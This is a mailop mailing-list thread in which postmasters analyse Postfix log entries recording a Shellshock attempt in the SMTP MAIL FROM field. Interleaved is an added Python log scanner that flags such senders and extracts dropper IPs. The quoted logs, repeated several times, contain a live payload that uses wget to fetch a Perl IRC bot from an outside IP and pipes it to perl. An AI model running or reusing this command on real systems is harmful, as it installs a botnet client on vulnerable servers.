Re: [mailop] new exploit?
On 2023-01-14 at 17:33 +0200, Mary wrote:
> Thank you, I'll take a closer look, because Shellshock implies that
> somehow the SMTPD executes a bash script, which I find highly
> unlikely. That is why I thought they are trying to exploit something
> further down the pipeline (Logstash, Prometheus, etc).

The command is a normal Shellshock payload. It would seem to target the case where the mail server or an MDA sets an environment variable with the MAIL FROM value and then executes a command through bash. This could be the execution of a milter, a procmail... courier also extensively uses environment variables between its programs.

The most difficult part is that a bash shell is executed... being an old version which is not patched for this 2014 vulnerability.

___
mailop mailing list
mailop@mailop.org
https://list.mailop.org/listinfo/mailop
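The scenario described in that reply (MAIL FROM copied into an environment variable and then handed to a bash that imports exported functions) is exactly the shape a log scanner can key on. The block below is an added example, not code from Postfix, bash or anyone in the thread. It parses Postfix "NOQUEUE: reject: RCPT from" lines, flags senders that begin with the bash exported-function marker `() {`, pulls out the trailing command and any IPv4 literals in it as indicators, and shows a hypothetical `env_for_child()` wrapper (an invented stand-in for MDA or milter glue) that refuses to export such a value. The log lines in `SAMPLE_LOG` are constructed: the postscreen lines are modelled on the ones quoted in the thread, and the benign smtpd rejection with example.net/example.org addresses is invented.

```python
"""Spot Shellshock-style MAIL FROM payloads in Postfix reject lines.

Added example for this thread, not code from Postfix, bash or any poster.
The log lines in SAMPLE_LOG are constructed (modelled on the postscreen lines
quoted in the thread, plus an invented benign smtpd rejection); the
env_for_child() wrapper is a hypothetical stand-in for MDA/milter glue.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

SAMPLE_LOG = """\
postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350: HELO x\\r\\n
postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350: 550 5.5.1 Protocol error; from=<() { :; }; wget -qO - 193.56.28.202/botF|perl>, to=<>, proto=SMTP, helo=<>
postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350
postfix/smtpd[641200]: NOQUEUE: reject: RCPT from unknown[203.0.113.9]: 554 5.7.1 <bob@example.org>: Relay access denied; from=<alice@example.net> to=<bob@example.org> proto=ESMTP helo=<mail.example.net>
"""

# Bash's exported-function encoding: the value starts with "() {", carries a
# function body up to the closing "}", and a CVE-2014-6271 bash kept parsing
# and executing whatever followed that brace when it imported the variable.
# Bash accepts optional whitespace between "()" and "{".
FUNC_EXPORT = re.compile(r'^\s*\(\)\s*\{(?P<body>.*?)\}\s*;?\s*(?P<trailer>.*)$', re.S)

# One Postfix "NOQUEUE: reject: RCPT from ..." line (postscreen or smtpd).
# The client may be "[ip]:port" or "name[ip]" without a port.
REJECT_LINE = re.compile(
    r'(?P<daemon>postfix/\w+)\[\d+\]: NOQUEUE: reject: RCPT from '
    r'(?P<client>\S+?)(?::\d+)?: .*?from=<(?P<sender>.*?)>[,\s]'
)

IPV4 = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')


@dataclass
class Finding:
    daemon: str
    client: str
    sender: str
    trailer: str                                     # what a vulnerable bash would have run
    hosts: List[str] = field(default_factory=list)   # IPv4 literals in the trailer


def is_shellshock_payload(value: str) -> bool:
    """True if value is shaped like a bash exported function definition."""
    return FUNC_EXPORT.match(value) is not None


def scan_log(text: str) -> List[Finding]:
    """Return one Finding per reject line whose sender is a function export."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = REJECT_LINE.search(line)
        if not m:
            continue
        sender = m.group('sender')
        f = FUNC_EXPORT.match(sender)
        if not f:
            continue
        trailer = f.group('trailer').strip()
        findings.append(Finding(
            daemon=m.group('daemon'),
            client=m.group('client'),
            sender=sender,
            trailer=trailer,
            hosts=IPV4.findall(trailer),
        ))
    return findings


def env_for_child(mail_from: str) -> Dict[str, str]:
    """Hypothetical MDA/milter glue: build the child environment from MAIL FROM.

    Refuses a value shaped like a function export instead of passing it to a
    child that may be, or may spawn, bash. A patched bash is the real fix;
    this only keeps client-controlled data out of the one shape the
    unpatched one executed.
    """
    if is_shellshock_payload(mail_from):
        raise ValueError('sender looks like a bash function export; not exporting')
    return {'SENDER': mail_from}


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit.daemon} client={hit.client} trailer={hit.trailer!r} hosts={hit.hosts}')
```

Run it against a real mail log by replacing `SAMPLE_LOG` with the file contents; the only line that produces a finding in the sample is the postscreen rejection, and the IPv4 literal it extracts is the dropper host, which is the indicator worth feeding to a blocklist or alert.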
Re: [mailop] new exploit?
Mary via mailop wrote on 2023-01-14 16:33:
> Thank you, I'll take a closer look, because Shellshock implies that
> somehow the SMTPD executes a bash script, which I find highly
> unlikely. That is why I thought they are trying to exploit something
> further down the pipeline (Logstash, Prometheus, etc).

postfix does not run anything in master.cf as root

postfix postscreen kills this bot before it even does SMTP
Re: [mailop] new exploit?
On 2023-01-14 at 09:16:05 UTC-0500 (Sat, 14 Jan 2023 16:16:05 +0200)
Mary via mailop is rumored to have said:

> Within the past several days, I've been monitoring a kind of exploit that
> affects the 'from' RCPT part of the smtp conversation:
>
> ```
> postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350: HELO x\r\n
> postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350: 550 5.5.1 Protocol error; from=<() { :; }; wget -qO - 193.56.28.202/botF|perl>, to=, proto=SMTP, helo=
> postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350
> ```
>
> Does anyone know what kind of software is the target of this attack?

It's a very lame attempt to exploit ShellShock. "Very lame" because that vulnerability is surely saturated by now (i.e. all vulnerable systems were popped years ago) and it didn't wait for the banner or give a minimally valid HELO, behavior that good mailservers have been shunning for almost 20 years now. It's a demo in "spammers & malware users are generally stupid."

> Obviously, it's not postfix, which quickly drops the connection. Could it
> be some kind of software that parses logs?

Hard to say, since obviously they also had more payload (else why try DATA?)

ShellShock attacks are grossly untargeted because the ways that mail (and web) servers make themselves vulnerable by errors in configuration are widely variable. They don't care if a particular MTA is Postfix 3.7 or Sendmail 5.2, because some mail admin might have had a lapse in configuration rigor on either.

> I'd appreciate your thoughts.
>
> PS: the payload is a perl IRC bot

-- 
Bill Cole
b...@scconsult.com or billc...@apache.org
(AKA @grumpybozo and many *@billmail.scconsult.com addresses)
Not Currently Available For Hire
Re: [mailop] new exploit?
Thank you, I'll take a closer look, because Shellshock implies that somehow the SMTPD executes a bash script, which I find highly unlikely. That is why I thought they are trying to exploit something further down the pipeline (Logstash, Prometheus, etc).

On Sat, 14 Jan 2023 14:41:17 + Collider via mailop wrote:
> I received one of these bad girls to my Nightmare Mail (fork of notqmail),
> albeit with a different argument to the attempted wget command (which was
> never processed, though my mailserver was able to successfully make delivery
> of this technically non-compliant message). It seems to my friends to be an
> attempt to exploit Shellshock.
Re: [mailop] new exploit?
I received one of these bad girls to my Nightmare Mail (fork of notqmail), albeit with a different argument to the attempted wget command (which was never processed, though my mailserver was able to successfully make delivery of this technically non-compliant message). It seems to my friends to be an attempt to exploit Shellshock.

On 14 January 2023 14:16:05 UTC, Mary via mailop wrote:
>
> Within the past several days, I've been monitoring a kind of exploit that
> affects the 'from' RCPT part of the smtp conversation:
>
> ```
> postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350: HELO x\r\n
> postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350: 550 5.5.1 Protocol error; from=<() { :; }; wget -qO - 193.56.28.202/botF|perl>, to=, proto=SMTP, helo=
> postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350
> ```
>
> Does anyone know what kind of software is the target of this attack?
>
> Obviously, it's not postfix, which quickly drops the connection. Could it be
> some kind of software that parses logs?
>
> I'd appreciate your thoughts.
>
> PS:
> the payload is a perl IRC bot

-- 
Sent from my Android device with K-9 Mail. Please excuse my brevity.
[mailop] new exploit?
Within the past several days, I've been monitoring a kind of exploit that affects the 'from' RCPT part of the smtp conversation:

```
postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350: HELO x\r\n
postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350: 550 5.5.1 Protocol error; from=<() { :; }; wget -qO - 193.56.28.202/botF|perl>, to=, proto=SMTP, helo=
postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350
```

Does anyone know what kind of software is the target of this attack?

Obviously, it's not postfix, which quickly drops the connection. Could it be some kind of software that parses logs?

I'd appreciate your thoughts.

PS:
the payload is a perl IRC bot